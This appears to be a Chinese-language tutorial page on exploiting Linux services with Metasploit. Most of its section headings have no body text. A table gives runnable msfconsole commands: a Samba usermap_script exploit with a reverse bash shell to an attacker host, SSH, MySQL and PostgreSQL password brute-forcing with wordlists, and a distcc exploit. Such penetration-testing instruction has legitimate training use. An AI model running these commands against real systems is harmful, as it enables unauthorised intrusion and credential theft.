linux

如何使用Metasploit进行Linux漏洞利用

小樊
31
2025-12-29 16:49:50
栏目: 编程语言

使用 Metasploit 进行 Linux 漏洞利用的实操指南

一 环境准备与合规要求

二 标准利用流程

三 Linux 常见利用示例

场景与服务 模块路径 关键设置 典型命令
Samba “username map script” RCE exploit/multi/samba/usermap_script 设置 RHOSTS(目标IP),端口通常为 139/445;可选正向/反向载荷 use exploit/multi/samba/usermap_script; set RHOSTS 192.168.1.102; set payload cmd/unix/reverse_bash; set LHOST <攻击机IP>; run
SSH 弱口令/字典爆破 auxiliary/scanner/ssh/ssh_login 设置 RHOSTS、RPORT、USER_FILE、PASS_FILE use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.100; set USER_FILE users.txt; set PASS_FILE rockyou.txt; run
MySQL 登录爆破 auxiliary/scanner/mysql/mysql_login 设置 RHOSTS、USER_FILE、PASS_FILE use auxiliary/scanner/mysql/mysql_login; set RHOSTS 192.168.1.111; set user_file users.txt; set pass_file passwords.txt; run
PostgreSQL 登录爆破 auxiliary/scanner/postgres/postgres_login 设置 RHOSTS、USER_FILE、PASS_FILE use auxiliary/scanner/postgres/postgres_login; set RHOSTS 192.168.1.111; set user_file users.txt; set pass_file passwords.txt; run
其他经典 Linux 服务漏洞 视服务而定(如 distcc、UnrealIRCd 等) 依据模块说明设置 RHOSTS 与载荷 示例:use exploit/unix/misc/distcc_exec; set RHOSTS ; run(示例仅用于合法靶机)
以上示例覆盖了常见的 Linux 服务弱点与 Metasploit 对应模块,参数名与用法以模块帮助为准。

四 后渗透与权限维持

五 故障排查与防御要点

0
看了该问题的人还看了